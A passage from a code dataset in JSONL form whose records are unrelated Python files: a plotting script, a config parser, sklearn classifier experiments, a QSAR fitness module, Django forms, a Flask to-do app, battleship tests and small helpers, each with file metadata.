1:\n\t\t\tacc_new.append(np.mean(acc[(i-1):(i+1)]))\n\t\tif i==0:\n\t\t\tacc_new.append(acc[i])\n\treturn np.array(acc_new)\n\n\ndef smooth(acc):\n\tacc_new = []\n\tfor i in range(acc.shape[0]):\n\t\tif i < acc.shape[0]-3:\n\t\t\tacc_new.append(np.mean(acc[(i):(i+3)]))\n\t\telse:\n\t\t\tacc_new.append(acc[i])\n\treturn np.array(acc_new)\n\nratio = [0.005, 0.01, 0.05, 0.1]\ntrue_ratio = []\n\nplot_lines = [-1]\n\nexpand = True\ninits = []\nepochs = [20, 30, 40, 50, 60, 70, 80, 90, 100]\n\nfor r in ratio:\n\tinit_test_accs = []\n\tfor epoch in epochs:\n\t\tinit_acc, init_test_acc = read_acc(str(r)+\"/init_enhance\"+str(epoch)+\"_m\"+str(r)+\"_warmup0.1.log\", ACC_SIG)\n\t\tinit_test_accs.append(init_test_acc)\n\tinits.append(init_test_accs)\n\n\nfigure_num = 0\n\ndot = [\"v-\", \"o-\", \"^-\", \".-\"]\nfor expand in [False]:\n\tplt.figure(figure_num, figsize=(5,4))\n\tpdb.set_trace()\n\tfor r in range(len(ratio)):\n\t\t#print(inits[r])\n\t\tif r < 2:\n\t\t\tplt.plot(epochs, reverse_smooth(np.array(inits[r])), dot[r], linewidth=2.0, label=str(ratio[r]))\n\t\telse:\n\t\t\tplt.plot(epochs, np.array(inits[r]), dot[r], linewidth=2.0, label=str(ratio[r]))\n\tplt.xlabel(\"Training epochs\", fontsize=18)\n\tplt.ylabel(\"Test Accuracy (%)\", fontsize=18)\n\t\n\tplt.legend(loc=\"best\", fontsize=12)\n\tplt.xticks(fontsize=15)\n\tplt.yticks(fontsize=15)\n\t# if expand:\n\t\t# plt.ylim((85, 95))\n\t\t# plt.xlim((50, 100))\n\t# else:\n\t#plt.ylim((40, 85))\n\tplt.tight_layout()\n\n\tif expand:\n\t\tplt.savefig(\"learning_rate_expand.pdf\")\n\telse:\n\t\tplt.savefig(\"learning_rate.pdf\")\n\tplt.show()\n\tfigure_num += 1 \n","sub_path":"trained_log/cifar/learning_rate/plot_convergence.py","file_name":"plot_convergence.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"191371702","text":"import abc\nfrom typing import Dict, get_type_hints, Union, List, Any, Type\nfrom inspect import isclass\nfrom ruamel.yaml import CommentedMap, CommentedSeq\nfrom .common_types import TriggerOrResponse, GlobalsDict\nfrom .boolean_helper import BooleanHelper\nfrom ..dict_enum import DictEnum\n\n\nclass TriggerOrResponseParser(abc.ABC):\n \"\"\" A common base parser for trigger/response configuration parsers\"\"\"\n\n def __init__(self, mapping_class: Type[DictEnum], element_base_class: Type[TriggerOrResponse]):\n self.__mapping_class = mapping_class\n self.__element_base_class = element_base_class\n\n @property\n def mapping_class(self) -> Type[DictEnum]:\n \"\"\" Returns the mapping class (`Triggers` or `Responses`)\"\"\"\n return self.__mapping_class\n\n @property\n def element_base_class(self) -> Type[TriggerOrResponse]:\n \"\"\" Returns the element base class (`BaseTrigger` or `BaseResponse`)\"\"\"\n return self.__element_base_class\n\n def parse_atomic(self, config: Dict[str, Any]) -> TriggerOrResponse:\n \"\"\"\n Parses an atomic configuration subtree as a trigger/response\n :param config: A configuration subtree to parse\n :return: The trigger/response object created from the given configuration subtree\n \"\"\"\n config_copy = dict(config)\n name = None\n if 'name' in config_copy:\n name = config_copy.pop('name')\n\n element = self.mapping_class[config_copy.pop('type')]\n\n # Some triggers (most of them) are classes and some are instances (mostly filter triggers).\n # This allows both cases to be used.\n # TODO: this comment does not seem to be correct any more. Try removing the case outside\n # the \"if\" block; All triggers and responses seem to be classes.\n if isclass(element):\n trigger_or_response = element(**config_copy)\n if name:\n trigger_or_response.name = name\n return trigger_or_response\n return element\n\n def parse_single(self, config: Union[CommentedMap, str], global_elements: GlobalsDict) \\\n -> TriggerOrResponse:\n \"\"\"\n Recursively parses a single configuration subtree as a trigger/response\n :param config: A configuration subtree to parse\n :param global_elements: A dictionary with all triggers and responses configured globally\n :return: The trigger/response object created from the given configuration subtree\n \"\"\"\n if isinstance(config, str):\n return BooleanHelper.parse_boolean_subrule(config, global_elements)\n\n config_copy = dict(config)\n parameters_to_parse = self.__find_parameters_to_parse_as_subelement(config)\n config.pop('type')\n\n for parameter in parameters_to_parse:\n config_copy[parameter] = self.parse_single(config[parameter], global_elements)\n\n return self.parse_atomic(config_copy)\n\n def parse_many(self, config: CommentedSeq, global_elements: GlobalsDict) \\\n -> Dict[str, TriggerOrResponse]:\n \"\"\"\n Parse all triggers/responses in a configuration\n :param config: A configuration subtree to config as a list of triggers/responses\n :param global_elements: A dictionary with all triggers and responses configured globally\n :return: A dictionary where keys are the original keys from the given configuration subtree\n and values are triggers/responses\n \"\"\"\n return {\n element['name']: self.parse_single(element, global_elements)\n for element\n in config\n }\n\n def __find_parameters_to_parse_as_subelement(self, config: CommentedMap) -> List[str]:\n \"\"\"\n Finds parameters in configuration which should be parsed as triggers/responses themselves\n (For example, when using a trigger/response that gets another trigger/response as a\n parameter).\n :param config: A configuration subtree to parse\n :return: List of the found parameter names\n \"\"\"\n\n mapping_class_constructor = self.mapping_class[config['type']].__init__\n parameters_type_hints = get_type_hints(mapping_class_constructor)\n parameters_to_parse = []\n\n for parameter_name in config:\n\n # Meta-parameters to ignore\n if parameter_name in ['type', 'name']:\n continue\n\n # If this parameter has no type hint, we cannot check if it should be parsed or not\n if parameter_name not in parameters_type_hints:\n continue\n\n type_hint = parameters_type_hints[parameter_name]\n\n origin_type = getattr(type_hint, '__origin__', None)\n\n if origin_type is not None:\n if origin_type == Union:\n if self.element_base_class in type_hint.__args__:\n parameters_to_parse.append(parameter_name)\n else:\n raise NotImplementedError(f'Origin type {origin_type} '\n f'is currently not supported')\n elif isclass(type_hint) and issubclass(type_hint, self.element_base_class):\n parameters_to_parse.append(parameter_name)\n\n return parameters_to_parse\n","sub_path":"gramhopper/configuration/trigger_or_response_parser.py","file_name":"trigger_or_response_parser.py","file_ext":"py","file_size_in_byte":5281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"160844654","text":"# SGDC Stochastic gradient descent classifier\r\n# written by Anthony Paech 29/11/19\r\n#\r\n# Take a excel spreadsheet that is a slice of the salestrans\r\n# ideally, filtered by customer code and product group and saved as a CSV\r\n# such that the features are simply\r\n# \"productcode\" \"day_delta\"\r\n# and the classes are binned values of the \"qty\"\r\n# these are read into a dictionary (the DictVectoriser is forgiving and very good)\r\n# and vectorised with one hot encoder\r\n# also test the accuracy with other models like naive bayes, random forest and Support vector machine\r\n#\r\n# pseudocode\r\n# load slice of sales trans straight from excel\r\n# choose columns X,y\r\n# cleanup NaN's\r\n# convert date to day_delta\r\n# create order_day_delta (the day gap between the last order and this one)\r\n# split into X_train, X_test, y_train, y_test\r\n# convert X_train and X_test to dictionaries\r\n# convert y_train, y_test to np.array()\r\n# bin the Y_train, Y_test data\r\n# use DictVectorizer on X_train\r\n# use SGDClassifier object\r\n# run using GridSearch\r\n# use ROC AUC to score predictions on y_test based on X_test\r\n#\r\n\r\n\r\n\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport csv\r\nfrom sklearn.metrics import roc_auc_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.feature_extraction import DictVectorizer\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.svm import SVC\r\n\r\ndef day_delta(df):\r\n\r\n# df['day_delta'] = (df.date.max()-df.date).dt.days.astype(int)\r\n df['day_delta'] = (df.date-df.date.min()).dt.days\r\n df.drop(columns='date',axis=1,inplace=True)\r\n # df.drop(df['date'],inplace=True)\r\n## date_N_days_ago = datetime.now() - timedelta(days=2)\r\n##\r\n## print(datetime.now())\r\n## print(date_N_days_ago)\r\n return df\r\n\r\ndef read_in_csvdata(filename,n, offset=0):\r\n X_dict, y = [], []\r\n with open(filename, 'r') as csvfile:\r\n reader = csv.DictReader(csvfile)\r\n for i in range(offset):\r\n next(reader)\r\n i = 0\r\n for row in reader:\r\n i += 1\r\n y.append(int(row['qty']))\r\n del row['qty'] #, row['location'], row['code'], row['refer'], row['linenumber']\r\n X_dict.append(row)\r\n if i >= n:\r\n break\r\n return X_dict, y\r\n\r\n\r\ndef read_in_exceldata(filename,n): #,offset=0):\r\n df=pd.read_excel(filename, \"Sheet1\")\r\n X=df.iloc[0:n,:2]\r\n Y=df.iloc[0:n,4].values\r\n# print(X)\r\n X=day_delta(X)\r\n # print(\"X=\\n\",X)\r\n #print(Counter(Y))\r\n # X_train, X_test, y_train, y_test = train_test_split(X,Y, test_size=0.2,random_state=42)\r\n # print(\"x train=\",X_train[:10])\r\n # X_dict_train=dict(X_train)\r\n #d = dict(enumerate(myarray.flatten(), 1))\r\n # X_dict_test=dict(X_test)\r\n return X_dict_train,X_dict_test,y_train,y_test\r\n\r\n\r\ndef read_excel(filename,rows):\r\n xls = pd.ExcelFile(filename) #'salestransslice1.xlsx')\r\n if rows==-1:\r\n return xls.parse(xls.sheet_names[0])\r\n else: \r\n return xls.parse(xls.sheet_names[0]).head(rows)\r\n\r\n\r\ndef write_excel(df,outfilename):\r\n df.to_excel(outfilename) #'salestransslice1.xlsx')\r\n return\r\n \r\ndef write_csv(df,outfilename):\r\n df.to_csv(outfilename,index=False) #'salestransslice1.xlsx')\r\n return\r\n \r\n\r\n\r\ndef discrete_ybins(array,bins):\r\n # divide the classes (or features) into a bucket number of equally sized ranges\r\n return pd.cut(array.astype(float),bins,labels=range(len(bins)-1),right=True,retbins=False) #.astype(int)\r\n \r\n\r\nn = 3000\r\nn2=800\r\nbins=[0,8,16,10000]\r\ninfile=\"salestransslice4-FLNOR.xlsx\"\r\noutfile=\"salestransslice4-FLNOR.csv\"\r\ndf=read_excel(infile,-1)\r\ndf=day_delta(df)\r\n\r\ndf['qty_bins']=pd.cut(df['qty'].values.astype(float),bins,labels=range(len(bins)-1),right=True,retbins=False)\r\nprint(\"df=\\n\",df.to_string())\r\ndf.dropna(inplace=True)\r\nwrite_csv(df,outfile)\r\n\r\n\r\n\r\nX_dict,y_list = read_in_csvdata(outfile,n,offset=0)\r\n\r\n#print(\"X_dict=\\n\",X_dict[:10],\"y_list=\\n\",y_list[:10])\r\n#print(list(X_dict)[:10])\r\n#X_train, X_test, y_train, y_test = train_test_split(list(X_dict),y_list, test_size=0.2,random_state=42)\r\n\r\n\r\ndict_one_hot_encoder = DictVectorizer(sparse=False)\r\nX_train = dict_one_hot_encoder.fit_transform(X_dict)\r\n#print(\"X_train=\\n\",X_train)\r\n\r\n\r\ny_train = discrete_ybins(np.array(y_list),bins)\r\n#print(\"y_train=\\n\",y_train)\r\n\r\n\r\n\r\nX_dict,y_list = read_in_csvdata(\"salestransslice4-FLNOR.csv\",n2,offset=n)\r\nX_test = dict_one_hot_encoder.transform(X_dict)\r\nprint(\"X_test=\\n\",X_test[:10])\r\n\r\n\r\ny_test= discrete_ybins(np.array(y_list),bins)\r\nprint(\"y_test=\\n\",y_test[:10])\r\n\r\n# Use scikit-learn package\r\n\r\nsgd_lr = SGDClassifier(loss='log', penalty=None, fit_intercept=True, max_iter=500, learning_rate='constant', eta0=0.01)\r\nsgd_lr.fit(X_train, y_train)\r\n\r\npredictions = sgd_lr.predict_proba(X_test)[:, 1]\r\nprint('The ROC AUC on testing set is: {0:.3f}'.format(roc_auc_score(y_test, predictions)))\r\n\r\n\r\n\r\n# Feature selection with L1 regularization\r\n##\r\n##l1_feature_selector = SGDClassifier(loss='log', penalty='l1', alpha=0.0001, fit_intercept=True, max_iter=5, learning_rate='constant', eta0=0.01)\r\n##l1_feature_selector.fit(X_train_10k, y_train_10k)\r\n###X_train_10k_selected = l1_feature_selector.transform(X_train_10k)\r\n##print(X_train_10k_selected.shape)\r\n##print(X_train_10k.shape)\r\n##\r\n### bottom 10 weights and the corresponding 10 least important features\r\n##print(np.sort(l1_feature_selector.coef_)[0][:10])\r\n##print(np.argsort(l1_feature_selector.coef_)[0][:10])\r\n### top 10 weights and the corresponding 10 most important features\r\n##print(np.sort(l1_feature_selector.coef_)[0][-10:])\r\n##print(np.argsort(l1_feature_selector.coef_)[0][-10:])\r\n\r\n\r\n\r\n\r\n\r\n# Multiclass classification with logistic regression\r\n\r\n##from sklearn.feature_extraction.text import TfidfVectorizer\r\n##from sklearn.datasets import fetch_20newsgroups\r\n##from sklearn.linear_model import SGDClassifier\r\n##from nltk.corpus import names\r\n##from nltk.stem import WordNetLemmatizer\r\n\r\n##all_names = set(names.words())\r\n##lemmatizer = WordNetLemmatizer()\r\n##\r\n##def letters_only(astr):\r\n## for c in astr:\r\n## if not c.isalpha():\r\n## return False\r\n## return True\r\n##\r\n##def clean_text(docs):\r\n## cleaned_docs = []\r\n## for doc in docs:\r\n## cleaned_docs.append(' '.join([lemmatizer.lemmatize(word.lower())\r\n## for word in doc.split()\r\n## if letters_only(word)\r\n## and word not in all_names]))\r\n## return cleaned_docs\r\n##\r\n##data_train = fetch_20newsgroups(subset='train', categories=None, random_state=42)\r\n##data_test = fetch_20newsgroups(subset='test', categories=None, random_state=42)\r\n##\r\n##cleaned_train = clean_text(data_train.data)\r\n##label_train = data_train.target\r\n##cleaned_test = clean_text(data_test.data)\r\n##label_test = data_test.target\r\n##\r\n##tfidf_vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5, stop_words='english', max_features=40000)\r\n##term_docs_train = tfidf_vectorizer.fit_transform(cleaned_train)\r\n##term_docs_test = tfidf_vectorizer.transform(cleaned_test)\r\n\r\n# combined with grid search\r\nfrom sklearn.model_selection import GridSearchCV\r\nparameters = {'penalty': ['l2', None],\r\n 'alpha': [1e-07, 1e-06, 1e-05, 1e-04],\r\n 'eta0': [0.01, 0.1, 1, 10]}\r\n\r\nsgd_lr = SGDClassifier(loss='log', learning_rate='constant', eta0=0.01, fit_intercept=True, max_iter=50)\r\n\r\ngrid_search = GridSearchCV(sgd_lr, parameters, n_jobs=-1, cv=3)\r\n\r\ngrid_search.fit(X_train, y_train)\r\nprint(grid_search.best_params_)\r\n\r\nsgd_lr_best = grid_search.best_estimator_\r\naccuracy = sgd_lr_best.score(X_test, y_test)\r\nprint('The accuracy on testing set is: {0:.1f}%'.format(accuracy*100))\r\n","sub_path":"SGDC_v1-00.py","file_name":"SGDC_v1-00.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"112327171","text":"from numpy import * # provides complex math and array functions\nimport hashlib\nimport GetInputData\nimport re\nimport sklearn.model_selection as ms\n#------------------------------------------------------------------------------\ndef cv_predict(model, set_x, set_y):\n # Predict using cross validation.\n yhat = empty_like(set_y)\n for idx in range(0, yhat.shape[0]):\n train_x = delete(set_x, idx, axis=0)\n train_y = delete(set_y, idx, axis=0)\n model = model.fit(train_x, train_y)\n yhat[idx] = model.predict(set_x[idx].reshape(1, -1))\n return yhat\n#------------------------------------------------------------------------------\n#Ahmad Hadaegh: Modified on: July 16, 2013\ndef calc_fitness(xi, Y, Yhat, c=2):\n \"\"\"\n Calculate fitness of a prediction.\n xi : array_like -- Mask of features to measure fitness of. Must be of dtype bool.\n c : float -- Adjustment parameter.\n \"\"\"\n p = len(xi) # Number of selected parameters\n n = len(Y) # Sample size\n numer = ((Y - Yhat)**2).sum()/n # Mean square error\n pcn = p*(c/n)\n if pcn >= 1:\n return 1000\n denom = (1 - pcn)**2\n theFitness = numer/denom\n return theFitness\n#------------------------------------------------------------------------------\n#Ahmad Hadaegh: Modified on: July 16, 2013\ndef InitializeTracks():\n trackDesc = {}\n trackFitness = {}\n trackCoefficients = {}\n trackModel = {}\n trackR2 = {}\n trackQ2 = {}\n trackR2PredValidation = {}\n trackR2PredTest = {}\n return trackDesc, trackFitness, trackCoefficients, trackModel, trackR2, trackQ2, \\\n trackR2PredValidation, trackR2PredTest\n#------------------------------------------------------------------------------\n#Ahmad Hadaegh: Modified on: July 16, 2013\ndef initializeYDimension():\n yTrain = {}\n yHatTrain = {}\n yHatCV = {}\n yValidation = {}\n yHatValidation = {}\n yTest = {}\n yHatTest = {}\n return yTrain, yHatTrain, yHatCV, yValidation, yHatValidation, yTest, yHatTest\n#------------------------------------------------------------------------------\ndef OnlySelectTheOnesColumns(popI):\n numOfFea = popI.shape[0]\n xi = zeros(numOfFea)\n for j in range(numOfFea):\n xi[j] = popI[j]\n xi = xi.nonzero()[0]\n xi = xi.tolist()\n return xi\n# -----------------------------------------------------------------------------\ndef cv_score(model, X_train_masked, X_validation_masked, X_test_masked,\n TrainY, ValidateY, TestY):\n\n numPop = TrainY.shape[0] + ValidateY.shape[0] + TestY.shape[0]\n alltargets = zeros(numPop)\n alltargets[0:TrainY.shape[0]] = TrainY\n alltargets[TrainY.shape[0]:TrainY.shape[0]+ValidateY.shape[0]] = ValidateY\n alltargets[TrainY.shape[0] + ValidateY.shape[0]:] = TestY\n\n\n print(alltargets)\n\n alldescriptors = zeros(numPop)\n\n exit(0)\n\n q2_loo = ms.cross_val_score(model, alldescriptors, alltargets).mean()\n\n#------------------------------------------------------------------------------\ndef validate_model(model, fileW, population, TrainX, TrainY, ValidateX, ValidateY,\n TestX, TestY, algorithm_name='GA', model_name='MLR', linear=1):\n numOfPop = population.shape[0]\n fitness = zeros(numOfPop)\n c = 2\n false = 0\n true = 1\n predictive = false\n\n trackDesc, trackFitness, trackCoefficients, trackModel,trackR2, trackQ2, \\\n trackR2PredValidation, trackR2PredTest = InitializeTracks()\n\n unfit = 1000\n itFits = 1\n for i in range(numOfPop):\n xi = OnlySelectTheOnesColumns(population[i])\n\n idx = hashlib.sha1(array(xi)).digest()\n\n X_train_masked = TrainX.T[xi].T\n X_validation_masked = ValidateX.T[xi].T\n X_test_masked = TestX.T[xi].T\n\n all_descriptors, all_targets = GetInputData.recombineSets(TrainX, ValidateX, TestX, TrainY, ValidateY, TestY)\n X_all_masked = all_descriptors.T[xi].T\n\n try:\n MLRmodel = model.fit(X_train_masked, TrainY)\n except:\n return unfit, fitness\n\n # Computed predicted values\n Yhat_cv = cv_predict(model, X_train_masked, TrainY) # Cross Validation prediction\n Yhat_train = model.predict(X_train_masked)\n Yhat_validation = model.predict(X_validation_masked)\n Yhat_test = model.predict(X_test_masked)\n\n # Compute R2 statistics (Prediction for Validation and Test set)\n cv = ms.ShuffleSplit(n_splits=5, test_size=0.3, random_state=0)\n #q2_loo = cv_score(model, X_train_masked, X_validation_masked, X_test_masked, TrainY, ValidateY, TestY)\n q2_loo = ms.cross_val_score(estimator=model, X=X_all_masked, y=all_targets, cv=cv).mean()\n\n r2_train = model.score(X_train_masked, TrainY)\n r2pred_validation = model.score(X_validation_masked, ValidateY)\n r2pred_test = model.score(X_test_masked, TestY)\n\n Y_fitness = append(TrainY, ValidateY)\n Yhat_fitness = append(Yhat_cv, Yhat_validation)\n\n fitness[i] = calc_fitness(xi, Y_fitness, Yhat_fitness, c)\n\n if predictive and ((q2_loo < 0.5) or (r2pred_validation < 0.5) or (r2pred_test < 0.5)):\n # if it's not worth recording, just return the fitness\n print(\"Ending program, fitness unacceptably low: \", predictive)\n continue\n\n coefficients = []\n if linear == 1:\n for c in model.coef_:\n coefficients.append(float(\"%.4f\"%c))\n\n # store stats\n #trackDesc[idx] = str(xi)\n trackDesc[idx] = (re.sub(\",\", \"_\", str(xi)))\n trackFitness[idx] = GetInputData.getTwoDecPoint(fitness[i])\n trackCoefficients[idx] = (re.sub(\",\", \"_\", str(coefficients)))\n trackModel[idx] = algorithm_name + ' with ' + model_name\n trackR2[idx] = GetInputData.getTwoDecPoint(r2_train)\n trackQ2[idx] = GetInputData.getTwoDecPoint(q2_loo)\n trackR2PredValidation[idx] = GetInputData.getTwoDecPoint(r2pred_validation)\n trackR2PredTest[idx] = GetInputData.getTwoDecPoint(r2pred_test)\n\n write(fileW, trackDesc, trackCoefficients, trackFitness, trackModel,\n trackR2, trackQ2, trackR2PredValidation, trackR2PredTest)\n return itFits, fitness.copy()\n#------------------------------------------------------------------------------\ndef write(fileW, descriptors, coefficients, fitnesses, modelnames, r2trainscores,\n q2scores, r2validscores, r2testscores):\n for key in fitnesses.keys():\n #if r2trainscores[key] >= 0.5 and r2validscores[key] >= 0.5 \\\n # and q2scores[key] >= 0.5 and r2testscores[key] >= 0.5:\n fileW.writerow([descriptors[key], coefficients[key], fitnesses[key], modelnames[key], r2trainscores[key], q2scores[key], r2validscores[key], r2testscores[key]])\n\n #fileOut.close()\n#------------------------------------------------------------------------------","sub_path":"Mining Program/CalcFitness.py","file_name":"CalcFitness.py","file_ext":"py","file_size_in_byte":6866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"262888786","text":"from django import forms\nfrom manager.models import roletable, UserInfoTable,ProductBrand,\\\n ProductCategory,ProductSubCategory,ProductType,ProductDetails,\\\n ProductSize,ProductStock\n\n\nclass roletableForm(forms.ModelForm):\n class Meta():\n model = roletable\n exclude = [\"roleid\", \"rolename\"]\n\n\nclass UserInfoTableForm(forms.ModelForm):\n class Meta():\n model = UserInfoTable\n\n exclude = [\"tbuserroleid\", \"tbuseremail\", \"tbusername\", \"tbuserpassword\", \"tbusermob\",\n \"tbuseraltmob\", \"tbuserimage\", \"tbuserpan\", \"tbuserpanimage\", \"tbuseradhar\",\n \"tbuseradharimage\", \"tbisactive\", \"tbuseraddress\", \"tbuserpincode\", \"tbotp\",\n \"tbotptime\", \"tbisverified\", \"tbauthtoken\"]\n\n\nclass ProductTypeForm(forms.ModelForm):\n class Meta():\n model = ProductType\n exclude = [\"tbproducttypeid\", \"tbproducttypename\", \"type_is_active\"]\n\nclass ProductCategoryForm(forms.ModelForm):\n class Meta():\n model = ProductCategory\n exclude = [\"tbcategoryid\", \"tbcategorytype\", \"category_is_active\"]\n\nclass ProductBrandForm(forms.ModelForm):\n class Meta():\n model = ProductBrand\n exclude = [\"tbbrandid\", \"tbbrandname\", \"brand_is_active\"]\n\n\nclass ProductSizeForm(forms.ModelForm):\n class Meta():\n model = ProductSize\n exclude = [\"tbproductsizeid\", \"tbproductsize\", \"tbcategoryid\", \"size_is_active\"]\n\nclass ProductSubCategoryForm(forms.ModelForm):\n class Meta():\n model = ProductSubCategory\n exclude = [\"tbsubcategoryid\",\"tbsubcategoryname\",\"fkcategoryid\"]\n\n\n\nclass ProductDetailsForm(forms.ModelForm):\n class Meta():\n model = ProductDetails\n exclude = [\"tbproductid\",\"fkproducttypeid\",\"fkproductcategoryid\",\n \"fkproductbrandid\",\"fksubcategoryid\",\"tbproductname\",\\\n \"tbproductprice\",\\\n \"tbproductdescription\",\"tbproductimage1\",\"tbproductimage2\",\\\n \"tbproductimage3\",\\\n \"tbproductimage4\",\"tbproductimage5\",\"tbproductimage6\",\"tbproductimage7\",\n \"tbproductquantity\",\"publishdate\",\\\n \"product_is_active\",\"tbuseremail\"]\n\n\nclass ProductStockForm(forms.ModelForm):\n class Meta():\n model = ProductStock\n exclude = [\"tbproductstockid\",\"fkproductid\",\"fkproductsizeid\",\"tbproductquantity\",\n \"stock_is_active\"]\n","sub_path":"manager/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"634175877","text":"from flask import Flask\nfrom flask import render_template, request, redirect, url_for\nfrom flask_sqlalchemy import SQLAlchemy\n\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///Databases/tasks.db'\ndb = SQLAlchemy(app)\n\nclass Task(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(100))\n content = db.Column(db.String(200))\n done = db.Column(db.Boolean)\n\napp.secret_key = \"da8vi2.d\"\n@app.route('/')\ndef home():\n tasks = Task.query.all()\n return render_template('index.html', task = tasks)\n\n@app.route('/create-task', methods=['POST'])\ndef create():\n task = Task(content=request.form['content'], title=request.form['title'], done=False)\n db.session.add(task)\n db.session.commit()\n return redirect(url_for('home'))\n \n\n@app.route('/done/')\ndef done(id):\n task = Task.query.filter_by(id=int(id)).first()\n task.done = not(task.done)\n db.session.commit()\n return redirect(url_for('home'))\n\n@app.route('/delete/')\ndef delete(id):\n task = Task.query.filter_by(id=int(id)).delete()\n db.session.commit()\n return redirect(url_for('home'))\n\n\nif __name__ == '__main__':\n app.run(port = 3000, debug = True)\n\n\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"145350217","text":"import pytest\n\nfrom hw6 import*\n\n\ndef test_size_submarine():\n submarine = Submarine('1').__reshape__()\n assert (submarine.Shape == np.array(['1', '1', '1'])).all()\n\n\ndef test_size_destroyer():\n destroyer = Destroyer('1').__reshape__()\n assert (destroyer.Shape == np.array(['1', '1', '1', '1'])).all()\n\n\ndef test_size_jet():\n jet = Jet('1').__reshape__()\n assert (jet.Shape == np.array([[0, '1', 0, 0], ['1', '1', '1', '1'], [0, '1', 0, 0]])).all()\n\n\ndef test_general_size():\n general = Ship('1').__reshape__()\n assert (general.Shape == np.array(['1'])).all()\n\n\ndef test_ship_valid_input_name_property():\n try:\n ship = Ship(3.)\n except TypeError:\n return True\n else:\n return False\n\n\ndef test_board_size():\n game = Game((3, 4, 4), 1, 1, 1).create_board()\n assert game.board.size == 48\n\n\ndef test_num_submarines():\n game = Game((3, 4, 4), 2, 1, 1).create_board()\n num_submarine = 0\n more = True\n while more:\n submarines4comp = np.ones_like(game.board)\n submarines4comp = np.select([submarines4comp == 1], [\"submarine\" + str(num_submarine)])\n if (game.board == submarines4comp).any():\n num_submarine += 1\n continue\n more = False\n assert num_submarine == 2\n\n\ndef test_num_destroyers():\n game = Game((3, 4, 4), 1, 2, 1).create_board()\n num_destroyer = 0\n more = True\n while more:\n destroyers4comp = np.ones_like(game.board)\n destroyers4comp = np.select([destroyers4comp == 1], [\"destroyer\" + str(num_destroyer)])\n if (game.board == destroyers4comp).any():\n num_destroyer += 1\n continue\n more = False\n assert num_destroyer == 2\n\n\ndef test_num_jets():\n game = Game((3, 8, 8), 1, 1, 2).create_board()\n num_jet = 0\n more = True\n while more:\n jets4comp = np.ones_like(game.board)\n jets4comp = np.select([jets4comp == 1], [\"jet\" + str(num_jet)])\n if (game.board == jets4comp).any():\n num_jet += 1\n continue\n more = False\n assert num_jet == 2\n\n\ndef test_impossible_assignment():\n try:\n game = Game((3, 4, 4), 5, 5, 3)\n except IndexError:\n return True\n else:\n return False\n","sub_path":"test_hw6.py","file_name":"test_hw6.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600734548","text":"def update_Odometry(Odom):\n\n \n position = Odom.pose.pose.position\n \n #Orientation uses the quaternion aprametrization.\n #To get the angular position along the z-axis, the following equation is required.\n q = Odom.pose.pose.orientation\n orientation = np.arctan2(2*(q.w*q.z+q.x*q.y),1-2*(q.y*q.y+q.z*q.z))\n\n if self.Init:\n #The initial data is stored to by subtracted to all the other values as we want to start at position (0,0) and orientation 0\n self.Init = False\n self.Init_ang = orientation\n self.globalAng = self.Init_ang\n Mrot = np.matrix([[np.cos(Init_ang), np.sin(Init_ang)],[-np.sin(Init_ang), np.cos(Init_ang)]]) \n self.Init_pos.x = Mrot.item((0,0))*position.x + Mrot.item((0,1))*position.y\n self.Init_pos.y = Mrot.item((1,0))*position.x + Mrot.item((1,1))*position.y\n self.Init_pos.z = position.z\n\n Mrot = np.matrix([[np.cos(self.Init_ang), np.sin(self.Init_ang)],[-np.sin(self.Init_ang), np.cos(self.Init_ang)]]) \n\n #We subtract the initial values\n self.globalPos.x = Mrot.item((0,0))*position.x + Mrot.item((0,1))*position.y - self.Init_pos.x\n self.globalPos.y = Mrot.item((1,0))*position.x + Mrot.item((1,1))*position.y - self.Init_pos.y\n self.globalAng = orientation - self.Init_ang\n \n \n ","sub_path":"src/Rotation_Script.py","file_name":"Rotation_Script.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"633448471","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Sep 18 22:42:49 2016\r\n\r\n@author: DIM\r\n\"\"\"\r\n\r\ndef isWordGuessed(secretWord, lettersGuessed):\r\n\r\n ls=[] \r\n for i in range(len(secretWord)):\r\n ls.append(secretWord[i])\r\n ls=set(ls)\r\n return ls.issubset(lettersGuessed)","sub_path":"week3_pset_1_1.py","file_name":"week3_pset_1_1.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"836902","text":"\n\nfrom xai.brain.wordbase.verbs._minor import _MINOR\n\n#calss header\nclass _MINORS(_MINOR, ):\n\tdef __init__(self,): \n\t\t_MINOR.__init__(self)\n\t\tself.name = \"MINORS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"minor\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_minors.py","file_name":"_minors.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"603283815","text":"# Copyright © 2020, United States Government, as represented by the\n# Administrator of the National Aeronautics and Space Administration.\n# All rights reserved.\n#\n# The DELTA (Deep Earth Learning, Tools, and Analysis) platform is\n# licensed under the Apache License, Version 2.0 (the 